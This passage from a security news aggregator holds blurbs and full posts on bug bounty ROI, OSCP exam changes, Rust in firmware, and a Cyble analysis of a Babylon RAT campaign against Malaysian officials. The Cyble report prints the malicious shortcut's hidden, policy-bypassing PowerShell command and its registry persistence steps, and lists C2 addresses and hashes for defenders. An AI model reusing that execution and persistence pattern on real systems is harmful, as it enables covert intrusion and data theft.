invested $200,000 in the bug bounty program and an additional $100,000 in red teaming exercises.Potential breach costs: A potential breach was estimated to cost the institution $5 million, including costs associated with restoring compromised systems, lost revenue, legal penalties, and reputational damage.Return on Investment (ROI)A simple ROI calculation looks at the return of $300,000 against a potential $5 million breach.Breach prevention: By identifying and mitigating vulnerabilities, the institution avoided a potential $5 million breach.Cost of testing: The total investment in proactive security testing was $300,000.Using Traditional ROI CalculationsTraditional ROI or cost-benefit analyses yield approximately $15.67 in ROI.If we look at ROM, we compare the cost of implementing security measures against the anticipated breach cost.In this scenario, the ROM indicates that for every dollar spent on mitigation, the organization potentially saves $16.67 in breach costs. For the sake of this case example, we kept these costs simple. However, it is important to remember that breach costs these days include much more than just a simple flat dollar amount. They also include potential ransom payments, compliance requirements, regulatory fines, legal fees, brand damage, and much more. Breaches in the financial services sector, for example, cost an average of $6.08 million.Real-World ROMAccording to the 7th Annual Hacker-Powered Security Report, the median price of a bug on the HackerOne platform is $500, up from $400 in 2022. The average bounty in the 90th percentile is up from $2,500 to $3,000. But here''s the dramatic reality: the cost of these vulnerabilities going unnoticed and being exploited in the wild is an overwhelming 1,600 times more than the cost of the bounty — $4.88M on average.“Since 2019, Zoom has worked with 900 hackers, of which 300 have submitted vulnerabilities that we have had to quickly move on. We’ve paid out over $7 million. It’s a substantial investment but the returns are worth it: we find world-class talent to find real-world solutions before it’s a real-world problem.”— Michael Adams, CISO, ZoomDeliver Strategic Value From Security Initiatives With HackerOneAt HackerOne, we’re not only the leader in high-quality, repeatable security engagements — we’re also the experts in helping partners quantify and qualify the value of those engagements for more robust security budgets and successful programs. To learn more about ROI and ROM and the best ways to express the value of proactive security to stakeholders with human-powered security, download the SANS White Paper: Human-Powered Security Testing. Excerpt Is ROI the right method to measure bug bounty value? Check out the cost-benefit analysis of ROI vs. ROM. Main Image

by HackerOne

A new supply chain attack technique targeting the Python Package Index (PyPI) registry has been exploited in the wild in an attempt to infiltrate downstream organizations. It has been codenamed Revival Hijack by software supply chain security firm JFrog, which said the attack method could be used to hijack 22,000 existing PyPI packages and result in ""hundreds of thousands"" of malicious package

by The Hacker News

Former BCG and Thinkproject Executive to Lead Code Intelligence Through Continued International Expansion Bonn, Germany — September 05, 2024 — Code Intelligence, the pioneer in AI-automated software testing, today announced the appointment of Dr. Eric Brüggemann as Chief Executive Officer (CEO), as the company continues to scale to meet growing international demand. Former CEO and Co-Founder Sergej Dechand will remain with the organization as Chief Evangelist.Dr. Brüggemann joined Code Intelligence as Managing Director and Chief Operating Officer (COO) last year, where he successfully led enterprise customer engagements for the company. During his tenure, he successfully laid the foundation for repeatable success and sustainable growth. Prior to Code Intelligence, he served as Chief of Staff at Thinkproject, leading the transformation from a heterogeneous product portfolio into a unified platform as well as expanding and further harmonizing the international footprint across more than 15 countries worldwide.

by Code Intelligence

Hacktivists unite for the #FreeDurov campaign to launch a massive cyber campaign against France in response to Telegram…

by Hackread

Google''s new update removes software intended only for cell phone store employees that could have been exploited by bad actors.

by ZDNET Security

The ElectionGuard project allows anyone — voters, campaign staffers, and election officials — to cryptographically verify ballots, a promise which may bolster faith in election integrity.

by Dark Reading

Applications and libraries supporting post-quantum cryptography in 2024

by Kaspersky

Sophisticated social engineering is expected to accompany threat campaigns that are highly targeted and aimed at stealing crypto and deploying malware.

by Dark Reading

Zyxel has released software updates to address a critical security flaw impacting certain access point (AP) and security router versions that could result in the execution of unauthorized commands. Tracked as CVE-2024-7261 (CVSS score: 9.8), the vulnerability has been described as a case of operating system (OS) command injection. ""The improper neutralization of special elements in the

by The Hacker News

Account takeover attacks have emerged as one of the most persistent and damaging threats to cloud-based SaaS environments. Yet despite significant investments in traditional security measures, many organizations continue to struggle with preventing these attacks. A new report, ""Why Account Takeover Attacks Still Succeed, and Why the Browser is Your Secret Weapon in Stopping Them"" argues that the

by The Hacker News

"" Hello pervert"" sextortion mails keep adding new features to their email to increase credibility and urge victims to pay

by Malwarebytes Labs

Every year, the role of AI in cybersecurity grows more prominent. This is especially true in the security operations center (SOC), where AI-native detection and GenAI-fueled workflows are advancing cyber defense and shaping the end-to-end analyst experience. But while defenders are using AI to operate with greater speed and scale, adversaries are following suit, using […]

by CrowdStrike

New research suggests that cyber-thieves can discover and use leaked credentials in a matter of seconds.

by ThreatDown

With the elections at full throttle we are seeing several types of scams resurfacing and undoubtedly more will come

by Malwarebytes Labs

The availability of deepfake technology has given threat actors a valuable tool for social engineering attacks, according to researchers at BlackBerry.

by KnowBe4

In cybersecurity, technology often takes center stage. From the latest AI-driven defenses to sophisticated encryption techniques, it''s easy to overlook the most crucial element: the human factor.

by KnowBe4

Beware of “Angry Stealer,” a new malware targeting your online accounts. This rebranded version of Rage Stealer steals…

by Hackread

2024-09-04 14:47:35

OSCP is not the same anymore

A few days ago, Offsec announced a change in the OSCP certification, which will now be called OSCP+. OffSec will replace the current OSCP exam with an updated version that includes the following changes:Changes in the Active Directory portionRemoval of bonus points1. Changes in the Active Directory portionTo meet the changing cybersecurity landscape and prepare candidates for real-world challenges, they have updated the Active Directory portion of the exam. This change is based on the “Assumed Compromised Model,” where you will be provided authorized access to a domain or user. With this initial access to the AD domain, your goal will be the full domain compromise.What are the Bonus points:Bonus points were a way to drive engagement and adoption, but most learners did not require bonus points to pass the OSCP exam. Rather, the exercises required to earn bonus points better enabled learners to train and prepare for a successful OSCP exam experience2. Removal of bonus pointsBefore this change, OffSec allowed candidates to earn up to 10 bonus points in their exam. This meant that if you secured 10 bonus points before attempting the exam, you only needed 60 points to pass the OSCP exam.However, with the removal of bonus points, candidates will no longer receive this benefit and must secure all 70 points during the exam. This change aims to provide more consistency and fairness across all OffSec exams and certifications.When you take the OSCP exam, candidates will earn both the OSCP and OSCP+ certifications. However, the OSCP+ certificate will expire after 3 years of issuance, while the OSCP certificate will not expire and is valid for a lifetime.Candidates can renew their OSCP+ certification in the following ways:Pass a recertification exam within 6 months of the OSCP+ expiryPass any other OffSec certification exam: OSEP, OSWA, OSED, or OSEEParticipate in a CPE program (details to be announced in late 2024)For Existing OSCP holders:OffSec is offering existing OSCP holders the chance to take the new OSCP+ exam at a discounted price of $199 USD if purchased between 1st Nov 2024 to 31st Mar 2025.If you are an existing OSCP holder, taking the OSCP+ exam is not mandatory. The changes in the exam will not affect your existing OSCP certification, which remains valid for a lifetime. However, if you want to upgrade to the OSCP+ certification, you will need to take the recertification exam.Reference:Link to the OffSec Support PortalBuy Me A Coffee☕You can buy me a coffee here.https://buymeacoffee.com/ommaniyaThanks for ReadingOSCP is not the same anymore was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

The Dutch Data Protection Authority (Dutch DPA) has imposed a fine of €30.5 million ($33.7 million) against facial recognition firm Clearview AI for violating the General Data Protection Regulation (GDPR) in the European Union (E.U.) by building an ""illegal database with billions of photos of faces,"" including those of Dutch citizens. ""Facial recognition is a highly intrusive technology that you

by The Hacker News

Torrance, United States / California, 4th September 2024, CyberNewsWire

by Hackread

A proximity resilience graph offers a more accurate representation of risk than heat maps and risk registers, and allows CISOs to tell a complex story in a single visualization.

by Dark Reading

Key takeaways  Cyble Research and Intelligence Lab (CRIL) has identified a highly targeted cyber-attack aimed at political figures and government officials, in Malaysia.   The attack showcases the advanced tactics employed by Threat Actor (TA) in targeting high-profile individuals and institutions.  The campaign active since July, has employed at least three distinct malicious ISO files specifically designed to compromise Malaysian entities.  The malicious ISO files contain multiple components, including a shortcut (LNK) file, a hidden PowerShell script, a malicious executable, and a decoy PDF file.   The campaign delivers Babylon RAT as a final payload.   Babylon RAT, an open-source Remote Access Trojan (RAT), provides unauthorized access to the victim’s machine. It allows the TA to execute commands remotely, control the system, and exfiltrate sensitive data.   Intelligence from Cyble Vision’s platform indicates that the TA behind this campaign has previously targeted Malaysian entities using Quasar RAT, another open-source RAT.  Overview  Cyble Research and Intelligence Lab (CRIL) has recently discovered a campaign involving malicious ISO files, targeting political figures and government officials within Malaysia. The initial infection vector for this campaign is unclear. The ISO file is crafted with deceptive elements to trick users into thinking they are interacting with legitimate files.   It contains a visible shortcut file that mimics a PDF document, alongside a hidden malicious executable, a lure PDF document, and a concealed PowerShell script.  Upon opening the shortcut file, the PowerShell script executes sneakily in the background, which then launches the decoy PDF and copies the malicious executable to the %appdata% directory. The script also creates a registry entry to ensure the executable runs on system startup and then executes the malicious file.  The final payload in this campaign is Babylon RAT, an open-source Remote Access Trojan (RAT) designed for comprehensive surveillance and data theft. Babylon RAT offers a wide range of malicious functionalities, including capturing keystrokes, clipboard monitoring, password extraction, and remote command execution.   It enables TAs to covertly monitor user activity and steal sensitive information. The RAT maintains persistence on infected systems through registry modifications, ensuring it can survive reboots and continue operations.   Additionally, Babylon RAT includes a sophisticated control panel, allowing TAs to efficiently manage compromised systems, execute commands remotely, and access stolen data, making it a powerful tool for cyber espionage and data exfiltration. The below Figure shows the Infection chain  Figure 1 -  infection chain  Technical Analysis  This campaign has been active since last July, with three distinct malicious ISO files observed targeting Malaysian entities. The use of three different lure documents suggests an attempt to reach a broader audience.   At the end of July, we observed two ISO files: one containing a lure document addressing political concerns in Malaysia, suggesting the campaign targets politically engaged individuals in the country. The other ISO file included a lure related to Majlis Amanah Rakyat (MARA), indicating that the TA is targeting Malaysian government officials. The below figure shows the lure documents observed in July.  Figure 2 - Lure Document  Figure 3 - Lure Document  At the end of August, we identified another malicious ISO file with a lure document related to the MyKHAS system, indicating that the TA is targeting Malaysian government officials who use the MyKHAS platform as shown below.   Figure 4 - Lure Document  In all three ISO files, a similar approach is used: each contains a visible shortcut file that resembles a PDF document, as well as a hidden malicious executable, a lure PDF document, and a concealed PowerShell script as shown in the below figure.   Figure 5 - inside iso file once mounted  For analysis, we are examining the ISO sample identified in August named “PANDUAN_PENGGUNA_MyKHAS.iso” with the sha256 value “d9f0268cbaa1ae45dfa755adab9dda2d8bdff3c8bf8a00d23bbc6894c28e225f”. When the user opens the [.]lnk file, it silently executes the hidden PowerShell script in the background. This execution is triggered by a command line embedded in the shortcut file, as mentioned below.  “%windir%/System32/cmd.exe /c powershell -WindowStyle hidden -nologo -executionpolicy bypass -File ""PANDUAN_PENGGUNA_MyKHAS.ps1”  Following this, the PowerShell script (.ps1) opens a decoy PDF file using the ""Invoke-Item"" command. It then copies the malicious executable, ''controller.exe,'' into the Windows “%appdata%” directory via the “Copy-Item” command.   To ensure the executable runs automatically at system startup, the script adds a startup entry in the registry under “HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” with the name “USBController.” Lastly, the script launches “controller.exe” from the current directory using the ""Invoke-Expression"" command.  Later, the PowerShell script (.ps1) opens the decoy PDF file using the “Invoke-Item” command. It then copies the malicious executable, ''controller.exe,'' to the “%appdata%” directory using “Copy-Item”. The script creates a startup entry in the registry under “HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” with the name “USBController” ensuring “controller.exe” is executed automatically on system startup.   Finally, the script starts “controller.exe” from the %appdata% directory using Invoke-Expression. The below figure shows the content of the malicious PowerShell script. The executable “controller.exe” has been identified as wrapper for Babylon RAT, an open-source remote access tool (RAT) commonly used by TAs for cyber espionage and data exfiltration.  Figure 6 - PowerShell script  Payload analysis  During our analysis, we discovered that the file “Controller.exe” contains a significant data overlay, approximately 300MB in size, which appears to be intentionally designed to evade detection by security products. This file employs ""Dynamic API Resolution"" using “GetModuleHandle” and “GetProcAddress”. This technique allows the wrapper to dynamically call Win32 cryptographic APIs to decrypt its embedded encrypted content. Specifically, it uses the below shown base data value to generate a 256-bit key via the “CryptDeriveKey” function, which is subsequently used with the AES-256 algorithm in the “CryptDecrypt” API to decrypt the payload.  Figure 7 – BaseData Value for CryptDeriveKey to create key for AES_256   Figure 8 - Decrypted payload  The decrypted payload, is again packed with an UPX packer, further the execution is transferred to the decrypted payload using the “CreateThread” windows API as shown in below figure   Figure 9 - Thread Creation  Babylon Rat  The decrypted payload is a Babylon RAT, which is an open-source remote access tool (RAT) widely used by cybercriminals for espionage and data theft. It allows TAs to take full control of a victim''s machine remotely, enabling actions like file manipulation, process management, and command execution. The RAT includes keylogging features, capturing user keystrokes to steal sensitive information like passwords. It also supports clipboard monitoring and can take screenshots of the victim’s desktop. Persistence mechanisms allow it to survive reboots by modifying system settings or registry keys.   Babylon RAT communicates with a command-and-control (C2) server for further instructions, data exfiltration, and payload delivery. It is often used for long-term surveillance and data harvesting in targeted cyberattacks. The below Figure shows the Babylon RAT string present in the process memory.  Figure 10 - Babylon Rat  C&C Communication:  The Babylon RAT samples observed in this campaign connect to command-and-control (C&C) servers at 149.28.19[.]207 and 64.176.65[.]152 over port 443, enabling TAs to gain control of the infected machine and exfiltrate sensitive data. While the identity of the TA behind this campaign remains unknown, intelligence from the Cyble Vision Platform indicates that these Malaysian entities were also targeted using Quasar RAT in the past.  Figure 11 –IP Address 64.176.65[.]152 Details in Cyble Vision   Conclusion  The sophisticated cyber-attack targeting political figures and government officials in Malaysia showcases the heightened interest and advanced techniques of the TAs. The ongoing campaign, involving malicious ISO files, highlights the severity of the threat and the persistent nature of such attacks. The use of Babylon RAT, an open-source Remote Access Trojan, illustrates the capability of these TAs to gain unauthorized control and exfiltrate sensitive data. Additionally, the recurrence of targeting Malaysian entities with similar tools, such as Quasar RAT, emphasizes the need for enhanced security measures and vigilance to defend against these evolving cyber threats.  Recommendations  Implement advanced email filtering solutions to detect and block malicious attachments, such as ISO files, and prevent them from reaching end users.  Deploy and regularly update endpoint security solutions, including antivirus and anti-malware software, to detect and mitigate threats like Babylon RAT.  Implement continuous network monitoring and anomaly detection to identify and respond to unusual activities or unauthorized connections, especially those involving command-and-control servers.  Conduct comprehensive security awareness training for political figures, and government officials to recognize and avoid phishing attempts and malicious files.  Ensure that all systems and software are kept up to date with the latest security patches to reduce vulnerabilities that could be exploited by threat actors.  MITRE ATT&CK® Techniques  Tactic  Technique  Procedure  Execution (TA0002)  User Execution: Malicious File (T1204.002)  The ISO file contains an LNK file disguised as a PDF. When executed, it runs a PowerShell script to initiate the attack.  Execution (TA0002)  Command and Scripting Interpreter: PowerShell (T1059.001)  The LNK file triggers a PowerShell script to execute the payload and create persistence.  Persistence (TA0003)  Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder (T1547.001)  The PowerShell script creates a startup entry in the registry  Defense Evasion (TA0005)  Dynamic API Resolution (T1027.007)  Cryptographic APIs resolved during runtime to evade IAT based detection   Defense Evasion (TA0005)  LNK Icon Smuggling (T1027.012)  LNK file disguised with a PDF icon  Defense Evasion (TA0005)   Encrypted/Encoded File (T1027.013)  The Babylon is encrypted with AES-256 encryption to evade detection by security tools.  Credential Access (TA0006)  Credentials from Password Stores: Credentials from Web Browsers (T1555.003)  Babylon RAT can extract passwords from web browsers  Discovery (TA0007)  System Information Discovery (T1082)  Babylon RAT collects system information from the victim''s machine.  Collection (TA0009)  Clipboard Data (T1115)  Babylon RAT monitors and logs clipboard data, storing it for later exfiltration.  Collection (TA0009)  Input Capture: Keylogging (T1056.001)  The RAT captures keystrokes using the SetWindowsHookEx win32 API  Command and Control  (TA0011)   Application Layer Protocol: Web Protocols (T1071.001)  BabylonRAT communicates with the TAs C2 server over web protocols.  Exfiltration (TA0010)  Exfiltration Over C2 Channel (T1041)  The TA exfiltrates collected data through the established C2 channel.  Indicators Of Compromise  Indicators   Indicator Type  Description  54a52310ade00eca0abb8ba32f4cacc42deb69b6e1f07309e44df2213bf2569c  SHA-256  SalahLaku_MARA.iso  d9f0268cbaa1ae45dfa755adab9dda2d8bdff3c8bf8a00d23bbc6894c28e225f  SHA-256  PANDUAN_PENGGUNA_MyKHAS.iso  8e6717e88ab6bb4a96e465dc0e9db3cf371e8e75af29e4c3ebc175707702b3b6  SHA-256  LimKitSiang_teks_penuh.iso  cf2b8c735f6acc0310ec76607b5c37ef994c96c74442373686e1f3a141c7a892  SHA-256  Salahlaku_Sektor_Keusahawanan_MARA.lnk  b9dddf801db527b3895409443fadeeced176b3ccac220395f700e91b151076b0  SHA-256  PANDUAN_PENGGUNA_MyKHAS.lnk  401a524c5a446107547475d27f9acd548182eac06294245dc43313b47ffa0e5c  SHA-256  Salahlaku_Sektor_Keusahawanan_MARA.ps1  f21ae37cb39658a62c9aaa945eb4dc2b33aebe4afeb5374d36328589a53e0982  SHA-256  controller.exe  77e22b511cd236cae46f55e50858aea174021a1cd431beaa5e7839a9d062e4c7  SHA-256  PDFview.exe  b348935e378b57001e6b41d96ae498ca00dd9fb296115a4e036dad8ccc7155d3  SHA-256  PANDUAN_PENGGUNA_MyKHAS.ps1  2a5a1ae773c59f18cceada37c4d78427ff18bd9a8c0ceb584c0cf997f6ac36b0  SHA-256  Kit_Siang_Bimbang_Gelombang_Hijau.ps1  f30901bd966b8c4803ffd517347167b4bba2c1b85cc7b5bcbe08791e249eb86b  SHA-256  Kit_Siang_Bimbang_Gelombang_Hijau.lnk  64.176.65.152  IP  C&C  workhub-microsoft-team.com  domain  C&C  149.28.19.207   IP  C&C  fund.sekretariatparti.org  domain  C&C  The post The Intricate Babylon RAT Campaign Targets Malaysian Politicians, Government appeared first on Cyble.

by CYBLE

I''m a big fan of YubiKeys and the fact that some of them are vulnerable to being cloned doesn''t change that. Let me explain.

by ZDNET Security

In recent years, the platform has become a go-to tool for executing almost all conceivable cybercriminal activity.

by Dark Reading

Posted by Ivan Lozano and Dominik Maier, Android Team Android''s use of safe-by-design principles drives our adoption of memory-safe languages like Rust, making exploitation of the OS increasingly difficult with every release. To provide a secure foundation, we’re extending hardening and the use of memory-safe languages to low-level firmware (including in Trusty apps).In this blog post, we''ll show you how to gradually introduce Rust into your existing firmware, prioritizing new code and the most security-critical code. You''ll see how easy it is to boost security with drop-in Rust replacements, and we''ll even demonstrate how the Rust toolchain can handle specialized bare-metal targets.Drop-in Rust replacements for C code are not a novel idea and have been used in other cases, such as librsvg’s adoption of Rust which involved replacing C functions with Rust functions in-place. We seek to demonstrate that this approach is viable for firmware, providing a path to memory-safety in an efficient and effective manner.Memory Safety for FirmwareFirmware serves as the interface between hardware and higher-level software. Due to the lack of software security mechanisms that are standard in higher-level software, vulnerabilities in firmware code can be dangerously exploited by malicious actors. Modern phones contain many coprocessors responsible for handling various operations, and each of these run their own firmware. Often, firmware consists of large legacy code bases written in memory-unsafe languages such as C or C++. Memory unsafety is the leading cause of vulnerabilities in Android, Chrome, and many other code bases.Rust provides a memory-safe alternative to C and C++ with comparable performance and code size. Additionally it supports interoperability with C with no overhead. The Android team has discussed Rust for bare-metal firmware previously, and has developed training specifically for this domain.Incremental Rust AdoptionOur incremental approach focusing on replacing new and highest risk existing code (for example, code which processes external untrusted input) can provide maximum security benefits with the least amount of effort. Simply writing any new code in Rust reduces the number of new vulnerabilities and over time can lead to a reduction in the number of outstanding vulnerabilities.You can replace existing C functionality by writing a thin Rust shim that translates between an existing Rust API and the C API the codebase expects. The C API is replicated and exported by the shim for the existing codebase to link against. The shim serves as a wrapper around the Rust library API, bridging the existing C API and the Rust API. This is a common approach when rewriting or replacing existing libraries with a Rust alternative.Challenges and ConsiderationsThere are several challenges you need to consider before introducing Rust to your firmware codebase. In the following section we address the general state of no_std Rust (that is, bare-metal Rust code), how to find the right off-the-shelf crate (a rust library), porting an std crate to no_std, using Bindgen to produce FFI bindings, how to approach allocators and panics, and how to set up your toolchain.The Rust Standard Library and Bare-Metal EnvironmentsRust''s standard library consists of three crates: core, alloc, and std. The core crate is always available. The alloc crate requires an allocator for its functionality. The std crate assumes a full-blown operating system and is commonly not supported in bare-metal environments. A third-party crate indicates it doesn’t rely on std through the crate-level #![no_std] attribute. This crate is said to be no_std compatible. The rest of the blog will focus on these.Choosing a Component to ReplaceWhen choosing a component to replace, focus on self-contained components with robust testing. Ideally, the components functionality can be provided by an open-source implementation readily available which supports bare-metal environments.Parsers which handle standard and commonly used data formats or protocols (such as, XML or DNS) are good initial candidates. This ensures the initial effort focuses on the challenges of integrating Rust with the existing code base and build system rather than the particulars of a complex component and simplifies testing. This approach eases introducing more Rust later on.Choosing a Pre-Existing Crate (Rust Library)Picking the right open-source crate (Rust library) to replace the chosen component is crucial. Things to consider are:Is the crate well maintained, for example, are open issues being addressed and does it use recent crate versions?How widely used is the crate? This may be used as a quality signal, but also important to consider in the context of using crates later on which may depend on it.Does the crate have acceptable documentation?Does it have acceptable test coverage?Additionally, the crate should ideally be no_std compatible, meaning the standard library is either unused or can be disabled. While a wide range of no_std compatible crates exist, others do not yet support this mode of operation – in those cases, see the next section on converting a std library to no_std.By convention, crates which optionally support no_std will provide an std feature to indicate whether the standard library should be used. Similarly, the alloc feature usually indicates using an allocator is optional.Note: Even when a library declares #![no_std] in its source, there is no guarantee that its dependencies don’t depend on std. We recommend looking through the dependency tree to ensure that all dependencies support no_std, or test whether the library compiles for a no_std target. The only way to know is currently by trying to compile the crate for a bare-metal target.For example, one approach is to run cargo check with a bare-metal toolchain provided through rustup:$ rustup target add aarch64-unknown-none$ cargo check --target aarch64-unknown-none --no-default-featuresPorting a std Library to no_stdIf a library does not support no_std, it might still be possible to port it to a bare-metal environment – especially file format parsers and other OS agnostic workloads. Higher-level functionality such as file handling, threading, and async code may present more of a challenge. In those cases, such functionality can be hidden behind feature flags to still provide the core functionality in a no_std build.To port a std crate to no_std (core+alloc):In the cargo.toml file, add a std feature, then add this std feature to the default featuresAdd the following lines to the top of the lib.rs:#![no_std]#[cfg(feature = ""std"")]extern crate std;extern crate alloc;Then, iteratively fix all occurring compiler errors as follows:Move any use directives from std to either core or alloc.Add use directives for all types that would otherwise automatically be imported by the std prelude, such as alloc::vec::Vec and alloc::string::String.Hide anything that doesn''t exist in core or alloc and cannot otherwise be supported in the no_std build (such as file system accesses) behind a #[cfg(feature = ""std"")] guard.Anything that needs to interact with the embedded environment may need to be explicitly handled, such as functions for I/O. These likely need to be behind a #[cfg(not(feature = ""std""))] guard.Disable std for all dependencies (that is, change their definitions in Cargo.toml, if using Cargo).This needs to be repeated for all dependencies within the crate dependency tree that do not support no_std yet.Custom Target ArchitecturesThere are a number of officially supported targets by the Rust compiler, however, many bare-metal targets are missing from that list. Thankfully, the Rust compiler lowers to LLVM IR and uses an internal copy of LLVM to lower to machine code. Thus, it can support any target architecture that LLVM supports by defining a custom target.Defining a custom target requires a toolchain built with the channel set to dev or nightly. Rust’s Embedonomicon has a wealth of information on this subject and should be referred to as the source of truth. To give a quick overview, a custom target JSON file can be constructed by finding a similar supported target and dumping the JSON representation:$ rustc --print target-list[...]armv7a-none-eabi[...]$ rustc -Z unstable-options --print target-spec-json --target armv7a-none-eabiThis will print out a target JSON that looks something like:$ rustc --print target-spec-json -Z unstable-options --target=armv7a-none-eabi{  ""abi"": ""eabi"",  ""arch"": ""arm"",  ""c-enum-min-bits"": 8,  ""crt-objects-fallback"": ""false"",  ""data-layout"": ""e-m:e-p:32:32-Fi8-i64:64-v128:64:128-a:0:32-n32-S64"",  [...]}This output can provide a starting point for defining your target. Of particular note, the data-layout field is defined in the LLVM documentation.Once the target is defined, libcore and liballoc (and libstd, if applicable) must be built from source for the newly defined target. If using Cargo, building with -Z build-std accomplishes this, indicating that these libraries should be built from source for your target along with your crate module:# set build-std to the list of libraries neededcargo build -Z build-std=core,alloc --target my_target.jsonBuilding Rust With LLVM PrebuiltsIf the bare-metal architecture is not supported by the LLVM bundled internal to the Rust toolchain, a custom Rust toolchain can be produced with any LLVM prebuilts that support the target.The instructions for building a Rust toolchain can be found in detail in the Rust Compiler Developer Guide. In the config.toml, llvm-config must be set to the path of the LLVM prebuilts.You can find the latest Rust Toolchain supported by a particular version of LLVM by checking the release notes and looking for releases which bump up the minimum supported LLVM version. For example, Rust 1.76 bumped the minimum LLVM to 16 and 1.73 bumped the minimum LLVM to 15. That means with LLVM15 prebuilts, the latest Rust toolchain that can be built is 1.75.Creating a Drop-In Rust ShimTo create a drop-in replacement for the C/C++ function or API being replaced, the shim needs two things: it must provide the same API as the replaced library and it must know how to run in the firmware’s bare-metal environment.Exposing the Same APIThe first is achieved by defining a Rust FFI interface with the same function signatures.We try to keep the amount of unsafe Rust as minimal as possible by putting the actual implementation in a safe function and exposing a thin wrapper type around.For example, the FreeRTOS coreJSON example includes a JSON_Validate C function with the following signature:JSONStatus_t JSON_Validate( const char * buf, size_t max );We can write a shim in Rust between it and the memory safe serde_json crate to expose the C function signature. We try to keep the unsafe code to a minimum and call through to a safe function early:#[no_mangle]pub unsafe extern ""C"" fn JSON_Validate(buf: *const c_char, len: usize) -> JSONStatus_t {    if buf.is_null() {        JSONStatus::JSONNullParameter as _    } else if len == 0 {        JSONStatus::JSONBadParameter as _    } else {        json_validate(slice_from_raw_parts(buf as _, len).as_ref().unwrap()) as _    }}// No more unsafe code in here.fn json_validate(buf: &[u8]) -> JSONStatus {    if serde_json::from_slice::<Value>(buf).is_ok() {        JSONStatus::JSONSuccess    } else {        ILLEGAL_DOC    }}Note: This is a very simple example. For a highly resource constrained target, you can avoid alloc and use serde_json_core, which has even lower overhead but requires pre-defining the JSON structure so it can be allocated on the stack.For further details on how to create an FFI interface, the Rustinomicon covers this topic extensively.Calling Back to C/C++ CodeIn order for any Rust component to be functional within a C-based firmware, it will need to call back into the C code for things such as allocations or logging. Thankfully, there are a variety of tools available which automatically generate Rust FFI bindings to C. That way, C functions can easily be invoked from Rust.The standard means of doing this is with the Bindgen tool. You can use Bindgen to parse all relevant C headers that define the functions Rust needs to call into. It''s important to invoke Bindgen with the same CFLAGS as the code in question is built with, to ensure that the bindings are generated correctly.Experimental support for producing bindings to static inline functions is also available.Hooking Up The Firmware’s Bare-Metal EnvironmentNext we need to hook up Rust panic handlers, global allocators, and critical section handlers to the existing code base. This requires producing definitions for each of these which call into the existing firmware C functions.The Rust panic handler must be defined to handle unexpected states or failed assertions. A custom panic handler can be defined via the panic_handler attribute. This is specific to the target and should, in most cases, either point to an abort function for the current task/process, or a panic function provided by the environment.If an allocator is available in the firmware and the crate relies on the alloc crate, the Rust allocator can be hooked up by defining a global allocator implementing GlobalAlloc.If the crate in question relies on concurrency, critical sections will need to be handled. Rust''s core or alloc crates do not directly provide a means for defining this, however the critical_section crate is commonly used to handle this functionality for a number of architectures, and can be extended to support more.It can be useful to hook up functions for logging as well. Simple wrappers around the firmware’s existing logging functions can expose these to Rust and be used in place of print or eprint and the like. A convenient option is to implement the Log trait.Fallible Allocations and allocRusts alloc crate normally assumes that allocations are infallible (that is, memory allocations won’t fail). However due to memory constraints this isn’t true in most bare-metal environments. Under normal circumstances Rust panics and/or aborts when an allocation fails; this may be acceptable behavior for some bare-metal environments, in which case there are no further considerations when using alloc.If there’s a clear justification or requirement for fallible allocations however, additional effort is required to ensure that either allocations can’t fail or that failures are handled. One approach is to use a crate that provides statically allocated fallible collections, such as the heapless crate, or dynamic fallible allocations like fallible_vec. Another is to exclusively use try_* methods such as Vec::try_reserve, which check if the allocation is possible.Rust is in the process of formalizing better support for fallible allocations, with an experimental allocator in nightly allowing failed allocations to be handled by the implementation. There is also the unstable cfg flag for alloc called no_global_oom_handling which removes the infallible methods, ensuring they are not used.Build OptimizationsBuilding the Rust library with LTO is necessary to optimize for code size. The existing C/C++ code base does not need to be built with LTO when passing -C lto=true to rustc. Additionally, setting -C codegen-unit=1 results in further optimizations in addition to reproducibility. If using Cargo to build, the following Cargo.toml settings are recommended to reduce the output library size:[profile.release]panic = ""abort""lto = truecodegen-units = 1strip = ""symbols""# opt-level ""z"" may produce better results in some circumstancesopt-level = ""s"" Passing the -Z remap-cwd-prefix=. flag to rustc or to Cargo via the RUSTFLAGS env var when building with Cargo to strip cwd path strings.In terms of performance, Rust demonstrates similar performance to C. The most relevant example may be the Rust binder Linux kernel driver, which found “that Rust binder has similar performance to C binder”.When linking LTO’d Rust staticlibs together with C/C++, it’s recommended to ensure a single Rust staticlib ends up in the final linkage, otherwise there may be duplicate symbol errors when linking. This may mean combining multiple Rust shims into a single static library by re-exporting them from a wrapper module.Memory Safety for Firmware, TodayUsing the process outlined in this blog post, You can begin to introduce Rust into large legacy firmware code bases immediately. Replacing security critical components with off-the-shelf open-source memory-safe implementations and developing new features in a memory safe language will lead to fewer critical vulnerabilities while also providing an improved developer experience.Special thanks to our colleagues who have supported and contributed to these efforts: Roger Piqueras Jover, Stephan Chen, Gil Cukierman, Andrew Walbran, and Erik Gilling

by Google Security Blog

Malwarebytes offers both free and premium antivirus services to help protect your device. Here''s what to know.

by ZDNET Security

A new malware campaign is spoofing Palo Alto Networks'' GlobalProtect VPN software to deliver a variant of the WikiLoader (aka WailingCrab) loader by means of a search engine optimization (SEO) campaign. The malvertising activity, observed in June 2024, is a departure from previously observed tactics wherein the malware has been propagated via traditional phishing emails, Unit 42 researchers

by The Hacker News

The vast majority of corporate finance professionals, 85%, now view such scams as an “existential” threat, a Medius study found.

by Cybersecurity Dive

Ransomware has evolved to target Linux systems. Learn about methods for infection and how to protect your IT environments from attacks.

by ITPro Today

As we continue to strengthen our presence in India and South Asia, we are excited to announce the appointment of Shashank Pathak to our Go-to-Market team. The post Zimperium Welcomes Shashank Pathak to Our Go-to-Market Team in India appeared first on Zimperium.

by Zimperium

The group has been among the most active threat groups of 2024, and is linked to a tool that can neutralize endpoint security.

by Cybersecurity Dive

Cybercrime wonk Sherrod DeGrippo is taking Microsoft’s software developers and engineers on a journey into her world, the depths of threat intelligence.

by Cybersecurity Dive

by ComputerWeekly

In this report, we provide an in-depth analysis of the Mallox ransomware, its evolution, ransom strategy, encryption scheme, etc.

by Securelist

